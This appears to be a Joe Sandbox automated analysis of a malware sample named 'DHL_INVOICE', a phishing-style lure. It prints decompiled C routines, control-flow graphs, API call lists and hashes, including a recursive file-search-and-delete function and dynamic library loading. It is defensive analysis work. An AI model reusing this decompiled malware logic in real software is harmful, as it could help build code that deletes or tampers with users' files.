                                                                            0x6f1c258b
                                                                            0x6f1c2585
                                                                            0x6f1c2585
                                                                            0x6f1c2585
                                                                            0x6f1c258d
                                                                            0x00000000
                                                                            0x6f1c258d
                                                                            0x6f1c255b
                                                                            0x6f1c255b
                                                                            0x6f1c255e
                                                                            0x6f1c256f
                                                                            0x00000000
                                                                            0x6f1c256f
                                                                            0x6f1c2562
                                                                            0x6f1c2563
                                                                            0x6f1c2565
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c256b
                                                                            0x00000000
                                                                            0x6f1c256b
                                                                            0x6f1c24e2
                                                                            0x6f1c2552
                                                                            0x00000000
                                                                            0x6f1c2552
                                                                            0x6f1c24e4
                                                                            0x6f1c24e4
                                                                            0x6f1c24e7
                                                                            0x6f1c2549
                                                                            0x00000000
                                                                            0x6f1c2549
                                                                            0x6f1c24e9
                                                                            0x6f1c24e9
                                                                            0x6f1c24ec
                                                                            0x6f1c2542
                                                                            0x00000000
                                                                            0x6f1c2542
                                                                            0x6f1c24ee
                                                                            0x6f1c24ee
                                                                            0x6f1c24f1
                                                                            0x6f1c253f
                                                                            0x00000000
                                                                            0x6f1c253f
                                                                            0x6f1c24f5
                                                                            0x6f1c24f6
                                                                            0x6f1c24f8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c24fe
                                                                            0x00000000
                                                                            0x6f1c24fe
                                                                            0x6f1c252d
                                                                            0x6f1c2532
                                                                            0x6f1c2534
                                                                            0x00000000
                                                                            0x6f1c2534
                                                                            0x6f1c2508
                                                                            0x6f1c250e
                                                                            0x6f1c250f
                                                                            0x6f1c2516
                                                                            0x6f1c251a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c251c
                                                                            0x6f1c251e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2520
                                                                            0x6f1c23d7
                                                                            0x6f1c23da
                                                                            0x6f1c2441
                                                                            0x6f1c2446
                                                                            0x6f1c244b
                                                                            0x6f1c2451
                                                                            0x6f1c2459
                                                                            0x6f1c2459
                                                                            0x6f1c245a
                                                                            0x6f1c245a
                                                                            0x6f1c2462
                                                                            0x6f1c2467
                                                                            0x6f1c246b
                                                                            0x6f1c246d
                                                                            0x6f1c2472
                                                                            0x6f1c247a
                                                                            0x6f1c247f
                                                                            0x6f1c2481
                                                                            0x6f1c2486
                                                                            0x6f1c248c
                                                                            0x6f1c2492
                                                                            0x6f1c2495
                                                                            0x6f1c249a
                                                                            0x6f1c249f
                                                                            0x6f1c24a4
                                                                            0x6f1c24a4
                                                                            0x6f1c24ac
                                                                            0x6f1c24ae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c24b4
                                                                            0x6f1c24b4
                                                                            0x00000000
                                                                            0x6f1c24b4
                                                                            0x6f1c23dc
                                                                            0x6f1c23df
                                                                            0x6f1c23fe
                                                                            0x6f1c2402
                                                                            0x6f1c2408
                                                                            0x6f1c240d
                                                                            0x6f1c2415
                                                                            0x6f1c241a
                                                                            0x6f1c241c
                                                                            0x6f1c2421
                                                                            0x6f1c2427
                                                                            0x6f1c242d
                                                                            0x6f1c2430
                                                                            0x6f1c2435
                                                                            0x6f1c243a
                                                                            0x00000000
                                                                            0x6f1c243a
                                                                            0x6f1c23e4
                                                                            0x00000000
                                                                            0x6f1c23ea
                                                                            0x6f1c23ec
                                                                            0x6f1c23f5
                                                                            0x00000000
                                                                            0x6f1c23f5
                                                                            0x6f1c23e4
                                                                            0x6f1c2a44
                                                                            0x6f1c2a4a
                                                                            0x6f1c2a50
                                                                            0x6f1c2a54
                                                                            0x6f1c2bd0
                                                                            0x6f1c2bd9
                                                                            0x6f1c2a68
                                                                            0x6f1c2a6a
                                                                            0x6f1c2a6d
                                                                            0x6f1c2af7
                                                                            0x6f1c2af7
                                                                            0x6f1c2afa
                                                                            0x6f1c2afd
                                                                            0x6f1c2b1a
                                                                            0x6f1c2b20
                                                                            0x6f1c2b26
                                                                            0x6f1c2b28
                                                                            0x6f1c2b3f
                                                                            0x6f1c2b3f
                                                                            0x6f1c2b3f
                                                                            0x6f1c2b47
                                                                            0x6f1c2b4c
                                                                            0x6f1c2b54
                                                                            0x6f1c2b56
                                                                            0x6f1c2b5a
                                                                            0x6f1c2b5b
                                                                            0x6f1c2b5e
                                                                            0x6f1c2b60
                                                                            0x6f1c2b67
                                                                            0x6f1c2b6d
                                                                            0x6f1c2b6f
                                                                            0x6f1c2b71
                                                                            0x6f1c2b76
                                                                            0x6f1c2b88
                                                                            0x6f1c2b88
                                                                            0x6f1c2b76
                                                                            0x6f1c2b6f
                                                                            0x6f1c2b5e
                                                                            0x6f1c2b8e
                                                                            0x6f1c2b92
                                                                            0x6f1c2b9c
                                                                            0x6f1c2ba4
                                                                            0x6f1c2bb1
                                                                            0x6f1c2bb8
                                                                            0x6f1c2bba
                                                                            0x6f1c2bc4
                                                                            0x6f1c2bca
                                                                            0x6f1c2bca
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2bcc
                                                                            0x6f1c2bcc
                                                                            0x6f1c2bcc
                                                                            0x6f1c2bcc
                                                                            0x00000000
                                                                            0x6f1c2bcc
                                                                            0x6f1c2bbc
                                                                            0x6f1c2bbc
                                                                            0x00000000
                                                                            0x6f1c2b94
                                                                            0x6f1c2b94
                                                                            0x6f1c2b9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2b9a
                                                                            0x6f1c2b92
                                                                            0x6f1c2b2b
                                                                            0x6f1c2b31
                                                                            0x6f1c2b37
                                                                            0x6f1c2b39
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2b39
                                                                            0x6f1c2aff
                                                                            0x6f1c2b06
                                                                            0x6f1c2b0c
                                                                            0x6f1c2b12
                                                                            0x00000000
                                                                            0x6f1c2b12
                                                                            0x6f1c2a73
                                                                            0x6f1c2a76
                                                                            0x6f1c2adc
                                                                            0x6f1c2adc
                                                                            0x6f1c2ae2
                                                                            0x6f1c2ae5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2aeb
                                                                            0x6f1c2aec
                                                                            0x00000000
                                                                            0x6f1c2af1
                                                                            0x6f1c2a7b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2a81
                                                                            0x6f1c2a81
                                                                            0x6f1c2a84
                                                                            0x6f1c2a8a
                                                                            0x6f1c2a8c
                                                                            0x6f1c2a95
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2a9c
                                                                            0x6f1c2aa7
                                                                            0x6f1c2ab0
                                                                            0x6f1c2ab6
                                                                            0x6f1c2abc
                                                                            0x6f1c2ac2
                                                                            0x6f1c2ad5
                                                                            0x00000000
                                                                            0x6f1c2ad5

                                                                            APIs
                                                                              • Part of subcall function 6F1C12F8: GlobalAlloc.KERNEL32(00000040,?,6F1C11C4,-000000A0), ref: 6F1C1302
                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6F1C294E
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 6F1C29A4
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 6F1C29AF
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C29C0
                                                                            • GlobalFree.KERNEL32(?), ref: 6F1C2A44
                                                                            • GlobalFree.KERNEL32(?), ref: 6F1C2A4A
                                                                            • GlobalFree.KERNEL32(?), ref: 6F1C2A50
                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 6F1C2B1A
                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 6F1C2B2B
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 6F1C2B82
                                                                            • lstrlenW.KERNEL32(00000808), ref: 6F1C2B9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                            • String ID:
                                                                            • API String ID: 1042148487-0
                                                                            • Opcode ID: 8b59361acaeeda6004835add95e3d99ed0b0d3a075cacb66a743bfa5cb535f4c
                                                                            • Instruction ID: b0715cbca6a64e71c8f7b747ec521cdb4812f424b64be4f64821053fcd6541a4
                                                                            • Opcode Fuzzy Hash: 8b59361acaeeda6004835add95e3d99ed0b0d3a075cacb66a743bfa5cb535f4c
                                                                            • Instruction Fuzzy Hash: DB42E371A48382DFD318CF38855079AB7E0FFA9794F105A2EE499D7280D778E5608B93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 919 406719-406742 call 406638 922 406744-406756 DeleteFileW 919->922 923 40675b-406765 919->923 924 4068da-4068e3 922->924 925 406767-406769 923->925 926 406778-40678b call 406b1a 923->926 927 4068c9-4068cf 925->927 928 40676f-406772 925->928 934 40679b-40679c call 406d10 926->934 935 40678d-406799 lstrcatW 926->935 932 4068d9 927->932 928->926 930 406892-40689a call 4065cf 928->930 930->932 941 40689c-4068b0 call 406556 call 406585 930->941 932->924 937 4067a1-4067a6 934->937 935->937 939 4067b2-4067b8 lstrcatW 937->939 940 4067a8-4067b0 937->940 942 4067ba-4067dd lstrlenW FindFirstFileW 939->942 940->939 940->942 955 4068d1-4068d4 call 405d3a 941->955 956 4068b2-4068b4 941->956 944 4067e3-4067e5 942->944 945 40687b-406880 942->945 947 4067e6-4067eb 944->947 945->932 949 406882-406890 945->949 950 406804-406817 call 406b1a 947->950 951 4067ed-4067f3 947->951 949->927 949->930 964 406819-406820 950->964 965 40682b-406834 call 406585 950->965 953 4067f5-4067fa 951->953 954 40685d-40686e FindNextFileW 951->954 953->950 958 4067fc-406802 953->958 954->947 961 406874-406875 FindClose 954->961 955->932 956->927 959 4068b6-4068c7 call 405d3a call 40623d 956->959 958->950 958->954 959->932 961->945 964->954 968 406822-406824 call 406719 964->968 972 406855-406858 call 405d3a 965->972 973 406836-406838 965->973 975 406829 968->975 972->954 976 40683a-40684b call 405d3a call 40623d 973->976 977 40684d-406853 973->977 975->954 976->954 977->954
                                                                            C-Code - Quality: 98%
                                                                            			E00406719(void* __eflags, WCHAR* _a4, signed char _a8) {
                                                                            				short _v544;
                                                                            				short _v546;
                                                                            				struct _WIN32_FIND_DATAW _v592;
                                                                            				signed int _v596;
                                                                            				signed char _v600;
                                                                            				signed int _v604;
                                                                            				signed int _t27;
                                                                            				void* _t40;
                                                                            				signed int _t43;
                                                                            				signed int _t46;
                                                                            				signed int _t54;
                                                                            				void* _t56;
                                                                            				signed char _t57;
                                                                            				signed int _t60;
                                                                            				WCHAR* _t61;
                                                                            				signed int _t64;
                                                                            				void* _t66;
                                                                            
                                                                            				_t57 = _a8;
                                                                            				_t61 = _a4;
                                                                            				_t60 = _t57 & 0x00000004;
                                                                            				_t27 = E00406638(__eflags, _t61);
                                                                            				_v600 = _t27;
                                                                            				if((_t57 & 0x00000008) != 0) {
                                                                            					_t54 = DeleteFileW(_t61); // executed
                                                                            					asm("sbb eax, eax");
                                                                            					_t56 =  ~_t54 + 1;
                                                                            					 *0x435ac8 =  *0x435ac8 + _t56;
                                                                            					return _t56;
                                                                            				}
                                                                            				_t64 = _t57 & 0x00000001;
                                                                            				__eflags = _t64;
                                                                            				_v600 = _t64;
                                                                            				if(_t64 == 0) {
                                                                            					L5:
                                                                            					E00406B1A(0x42fdc0, _t61);
                                                                            					__eflags = _t64;
                                                                            					if(_t64 == 0) {
                                                                            						E00406D10(_t61);
                                                                            					} else {
                                                                            						lstrcatW(0x42fdc0, L"\\*.*");
                                                                            					}
                                                                            					__eflags =  *_t61;
                                                                            					if( *_t61 != 0) {
                                                                            						L10:
                                                                            						lstrcatW(_t61, 0x4092b0);
                                                                            						goto L11;
                                                                            					} else {
                                                                            						__eflags =  *0x42fdc0 - 0x5c;
                                                                            						if( *0x42fdc0 != 0x5c) {
                                                                            							L11:
                                                                            							_v604 =  &(_t61[lstrlenW(_t61)]);
                                                                            							_t27 = FindFirstFileW(0x42fdc0,  &_v592);
                                                                            							_t66 = _t27;
                                                                            							__eflags = _t66 - 0xffffffff;
                                                                            							if(_t66 == 0xffffffff) {
                                                                            								L27:
                                                                            								__eflags = _v600;
                                                                            								if(_v600 == 0) {
                                                                            									goto L35;
                                                                            								}
                                                                            								_t27 = _v604;
                                                                            								 *((short*)(_t27 - 2)) = 0;
                                                                            								__eflags = _v596;
                                                                            								if(_v596 == 0) {
                                                                            									goto L33;
                                                                            								}
                                                                            								goto L29;
                                                                            							}
                                                                            							_t40 = 0x2e;
                                                                            							do {
                                                                            								__eflags = _v592.cFileName - _t40;
                                                                            								if(_v592.cFileName != _t40) {
                                                                            									L17:
                                                                            									E00406B1A(_v604,  &(_v592.cFileName));
                                                                            									__eflags = _v600 & 0x00000010;
                                                                            									if(__eflags == 0) {
                                                                            										_t43 = E00406585(__eflags, _t61, _t60);
                                                                            										__eflags = _t43;
                                                                            										if(_t43 != 0) {
                                                                            											E00405D3A(0xfffffff2, _t61);
                                                                            										} else {
                                                                            											__eflags = _t60;
                                                                            											if(_t60 == 0) {
                                                                            												 *0x435ac8 =  *0x435ac8 + 1;
                                                                            											} else {
                                                                            												E00405D3A(0xfffffff1, _t61);
                                                                            												E0040623D(_t61, 0);
                                                                            											}
                                                                            										}
                                                                            									} else {
                                                                            										__eflags = (_t57 & 0x00000003) - 3;
                                                                            										if(__eflags == 0) {
                                                                            											E00406719(__eflags, _t61, _t57);
                                                                            										}
                                                                            									}
                                                                            									goto L25;
                                                                            								}
                                                                            								__eflags = _v546;
                                                                            								if(_v546 == 0) {
                                                                            									goto L25;
                                                                            								}
                                                                            								__eflags = _v546 - _t40;
                                                                            								if(_v546 != _t40) {
                                                                            									goto L17;
                                                                            								}
                                                                            								__eflags = _v544;
                                                                            								if(_v544 == 0) {
                                                                            									goto L25;
                                                                            								}
                                                                            								goto L17;
                                                                            								L25:
                                                                            								_t46 = FindNextFileW(_t66,  &_v592);
                                                                            								__eflags = _t46;
                                                                            								_t40 = 0x2e;
                                                                            							} while (_t46 != 0);
                                                                            							_t27 = FindClose(_t66);
                                                                            							goto L27;
                                                                            						}
                                                                            						goto L10;
                                                                            					}
                                                                            				} else {
                                                                            					__eflags = _t27;
                                                                            					if(_t27 == 0) {
                                                                            						L33:
                                                                            						 *0x435ac8 =  *0x435ac8 + 1;
                                                                            						L35:
                                                                            						return _t27;
                                                                            					}
                                                                            					__eflags = _t57 & 0x00000002;
                                                                            					if((_t57 & 0x00000002) == 0) {
                                                                            						L29:
                                                                            						_t27 = E004065CF(_t61);
                                                                            						__eflags = _t27;
                                                                            						if(_t27 == 0) {
                                                                            							goto L35;
                                                                            						}
                                                                            						E00406556(_t61);
                                                                            						_t27 = E00406585(__eflags, _t61, _t60 | 0x00000001);
                                                                            						__eflags = _t27;
                                                                            						if(_t27 != 0) {
                                                                            							_t27 = E00405D3A(0xffffffe5, _t61);
                                                                            							goto L35;
                                                                            						}
                                                                            						__eflags = _t60;
                                                                            						if(_t60 == 0) {
                                                                            							goto L33;
                                                                            						}
                                                                            						E00405D3A(0xfffffff1, _t61);
                                                                            						_t27 = E0040623D(_t61, 0);
                                                                            						goto L35;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            			}




















                                                                            0x00406720
                                                                            0x00406728
                                                                            0x00406733
                                                                            0x00406736
                                                                            0x0040673b
                                                                            0x00406742
                                                                            0x00406745
                                                                            0x0040674d
                                                                            0x0040674f
                                                                            0x00406750
                                                                            0x00000000
                                                                            0x00406750
                                                                            0x0040675e
                                                                            0x0040675e
                                                                            0x00406761
                                                                            0x00406765
                                                                            0x00406778
                                                                            0x0040677e
                                                                            0x00406783
                                                                            0x0040678b
                                                                            0x0040679c
                                                                            0x0040678d
                                                                            0x00406797
                                                                            0x00406797
                                                                            0x004067a3
                                                                            0x004067a6
                                                                            0x004067b2
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067a8
                                                                            0x004067a8
                                                                            0x004067b0
                                                                            0x004067ba
                                                                            0x004067c4
                                                                            0x004067d2
                                                                            0x004067d8
                                                                            0x004067da
                                                                            0x004067dd
                                                                            0x0040687b
                                                                            0x0040687b
                                                                            0x00406880
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406882
                                                                            0x00406888
                                                                            0x0040688c
                                                                            0x00406890
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x004067e5
                                                                            0x004067e6
                                                                            0x004067e6
                                                                            0x004067eb
                                                                            0x00406804
                                                                            0x0040680d
                                                                            0x00406812
                                                                            0x00406817
                                                                            0x0040682d
                                                                            0x00406832
                                                                            0x00406834
                                                                            0x00406858
                                                                            0x00406836
                                                                            0x00406836
                                                                            0x00406838
                                                                            0x0040684d
                                                                            0x0040683a
                                                                            0x0040683d
                                                                            0x00406846
                                                                            0x00406846
                                                                            0x00406838
                                                                            0x00406819
                                                                            0x0040681e
                                                                            0x00406820
                                                                            0x00406824
                                                                            0x00406824
                                                                            0x00406820
                                                                            0x00000000
                                                                            0x00406817
                                                                            0x004067ed
                                                                            0x004067f3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067f5
                                                                            0x004067fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067fc
                                                                            0x00406802
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040685d
                                                                            0x00406863
                                                                            0x0040686b
                                                                            0x0040686d
                                                                            0x0040686d
                                                                            0x00406875
                                                                            0x00000000
                                                                            0x00406875
                                                                            0x00000000
                                                                            0x004067b0
                                                                            0x00406767
                                                                            0x00406767
                                                                            0x00406769
                                                                            0x004068c9
                                                                            0x004068c9
                                                                            0x004068d9
                                                                            0x00000000
                                                                            0x004068d9
                                                                            0x0040676f
                                                                            0x00406772
                                                                            0x00406892
                                                                            0x00406893
                                                                            0x00406898
                                                                            0x0040689a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040689d
                                                                            0x004068a9
                                                                            0x004068ae
                                                                            0x004068b0
                                                                            0x004068d4
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068b2
                                                                            0x004068b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068b9
                                                                            0x004068c2
                                                                            0x00000000
                                                                            0x004068c2
                                                                            0x00000000
                                                                            0x00406772

                                                                            APIs
                                                                              • Part of subcall function 00406638: lstrlenW.KERNEL32(004305C0,00000000,004305C0,004305C0,00000000,?,?,0040673B,?,00000000,761B3420,?), ref: 0040668C
                                                                              • Part of subcall function 00406638: GetFileAttributesW.KERNEL32(004305C0,004305C0), ref: 0040669D
                                                                            • DeleteFileW.KERNELBASE(?,?,00000000,761B3420,?), ref: 00406745
                                                                            • lstrcatW.KERNEL32(0042FDC0,\*.*), ref: 00406797
                                                                            • lstrcatW.KERNEL32(?,004092B0), ref: 004067B8
                                                                            • lstrlenW.KERNEL32(?), ref: 004067BB
                                                                            • FindFirstFileW.KERNEL32(0042FDC0,?), ref: 004067D2
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406863
                                                                            • FindClose.KERNEL32(00000000), ref: 00406875
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                            • String ID: \*.*
                                                                            • API String ID: 2636146433-1173974218
                                                                            • Opcode ID: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
                                                                            • Instruction ID: dccc3e871a12a5ab9d695c44a96518fee9cafe6829caada924bdb8552f231abd
                                                                            • Opcode Fuzzy Hash: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
                                                                            • Instruction Fuzzy Hash: 084106322067116AD7207B259C49A6B73A8EF41318F16893FF943F21D1E73C8D6586AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004065CF(WCHAR* _a4) {
                                                                            				void* _t2;
                                                                            
                                                                            				_t2 = FindFirstFileW(_a4, 0x4321c0); // executed
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					return 0;
                                                                            				}
                                                                            				FindClose(_t2); // executed
                                                                            				return 0x4321c0;
                                                                            			}




                                                                            0x004065da
                                                                            0x004065e3
                                                                            0x00000000
                                                                            0x004065f0
                                                                            0x004065e6
                                                                            0x00000000

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(00000000,004321C0,00000000,0040667C,004305C0), ref: 004065DA
                                                                            • FindClose.KERNELBASE(00000000), ref: 004065E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
                                                                            • Instruction ID: 9bce445b90ad5ff1b83c175b3b927286731ee1a5929a82a3f0dae3cb9bd988e9
                                                                            • Opcode Fuzzy Hash: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
                                                                            • Instruction Fuzzy Hash: 64D012756051316BD70057787E0CC8B7F699F05330F158A36B066F11F5D7748C6196AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 199 404f92-404fab 200 404fb1-404fb7 199->200 201 405133-405145 199->201 200->201 202 404fbd-404fc0 200->202 203 405147-405187 GetDlgItem * 2 call 40551a SetClassLongW call 401533 201->203 204 40518d-4051a1 201->204 205 404fc2-404fd7 SetWindowPos 202->205 206 404fdc-404fdf 202->206 203->204 208 4051a3-4051a5 204->208 209 4051df-4051e4 call 4054e8 204->209 210 40511f 205->210 211 404fe1-405000 ShowWindow 206->211 212 40502f-405035 206->212 215 4051d7-4051d9 208->215 216 4051a7-4051b2 call 401399 208->216 220 4051e9-405208 209->220 217 405123-40512e call 40575b 210->217 211->217 219 405006-40501c GetWindowLongW 211->219 221 405051-405054 212->221 222 405037-40504c DestroyWindow 212->222 215->209 218 4054aa 215->218 216->215 235 4051b4-4051d2 SendMessageW 216->235 232 4054ac-4054b3 217->232 218->232 219->217 226 405022-40502a ShowWindow 219->226 227 40520a-405215 call 401533 220->227 228 40521b-405221 220->228 230 405056-405064 SetWindowLongW 221->230 231 405069-40506f 221->231 229 40548e-405495 222->229 226->217 227->228 239 405227-405229 228->239 240 40546a-405483 DestroyWindow EndDialog 228->240 229->218 238 405497-405499 229->238 230->232 231->210 241 405075-40508f GetDlgItem 231->241 235->232 238->218 244 40549b-4054a4 ShowWindow 238->244 239->240 245 40522f-405286 call 405eba call 40551a * 3 GetDlgItem 239->245 242 405489 240->242 246 405091-4050aa SendMessageW IsWindowEnabled 241->246 247 4050b4-4050b9 241->247 242->229 244->218 275 405294-4052e3 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 245->275 276 405288-405290 245->276 246->218 249 4050b0 246->249 250 4050bb-4050bc 247->250 251 4050be-4050c1 247->251 249->247 252 4050ff-405104 call 405958 250->252 253 4050d0-4050d3 251->253 254 4050c3-4050ca 251->254 252->217 256 405106-405119 SendMessageW 253->256 258 4050d5-4050dc 253->258 254->256 257 4050cc-4050ce 254->257 256->210 257->252 261 4050ec-4050f5 call 401533 258->261 262 4050de-4050ea call 401533 258->262 261->217 273 4050f7 261->273 272 4050fd 262->272 272->252 273->272 277 4052e5-4052e6 275->277 278 4052e8 275->278 276->275 279 4052e9-405314 GetSystemMenu EnableMenuItem SendMessageW 277->279 278->279 280 405316-40532b SendMessageW 279->280 281 40532d 279->281 282 405333-405379 call 405503 call 405d1b call 406b1a lstrlenW call 405eba SetWindowTextW call 401399 280->282 281->282 282->220 293 40537f-405381 282->293 293->220 294 405387-40538b 293->294 295 4053aa-4053be DestroyWindow 294->295 296 40538d-405393 294->296 295->242 298 4053c4-4053f1 CreateDialogParamW 295->298 296->218 297 405399-40539f 296->297 297->220 299 4053a5 297->299 298->229 300 4053f7-40544e call 40551a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 298->300 299->218 300->218 305 405450-405463 ShowWindow call 4054e8 300->305 307 405468 305->307 307->242
                                                                            C-Code - Quality: 79%
                                                                            			E00404F92(struct HWND__* _a4, int _a8, signed int _a12, long _a16) {
                                                                            				signed int _v32;
                                                                            				struct HWND__* _v40;
                                                                            				void* _v84;
                                                                            				void* _v88;
                                                                            				signed int _t51;
                                                                            				signed int _t53;
                                                                            				intOrPtr _t55;
                                                                            				struct HWND__* _t58;
                                                                            				signed int _t67;
                                                                            				int _t77;
                                                                            				struct HWND__* _t113;
                                                                            				struct HWND__* _t137;
                                                                            				signed int _t139;
                                                                            				signed int _t140;
                                                                            				signed int _t141;
                                                                            				struct HWND__* _t142;
                                                                            				signed int _t143;
                                                                            				long _t146;
                                                                            				int _t149;
                                                                            				struct HWND__* _t156;
                                                                            				void* _t159;
                                                                            
                                                                            				_t137 = _a4;
                                                                            				_t143 = _a8;
                                                                            				if(_t143 == 0x110 || _t143 == 0x408) {
                                                                            					_t139 = _a12;
                                                                            					 *0x42dd48 = _t139;
                                                                            					if(_t143 == 0x110) {
                                                                            						 *0x4349f8 = _t137;
                                                                            						 *0x42dd54 = GetDlgItem(_t137, 1);
                                                                            						_t113 = GetDlgItem(_t137, 2);
                                                                            						_push(0xffffffff);
                                                                            						_push(0x1c);
                                                                            						 *0x42dd58 = _t113;
                                                                            						E0040551A(_t137);
                                                                            						SetClassLongW(_t137, 0xfffffff2,  *0x4349d8);
                                                                            						 *0x4349ec = E00401533(4);
                                                                            						_t139 = 1;
                                                                            						 *0x42dd48 = 1;
                                                                            					}
                                                                            					_t51 =  *0x40b014; // 0x0
                                                                            					_t146 = (_t51 << 6) +  *0x435a20;
                                                                            					if(_t51 < 0) {
                                                                            						L38:
                                                                            						E004054E8(0x40b);
                                                                            						while(1) {
                                                                            							_t140 =  *0x40b014; // 0x0
                                                                            							_t53 =  *0x42dd48;
                                                                            							_t141 = _t140 + _t53;
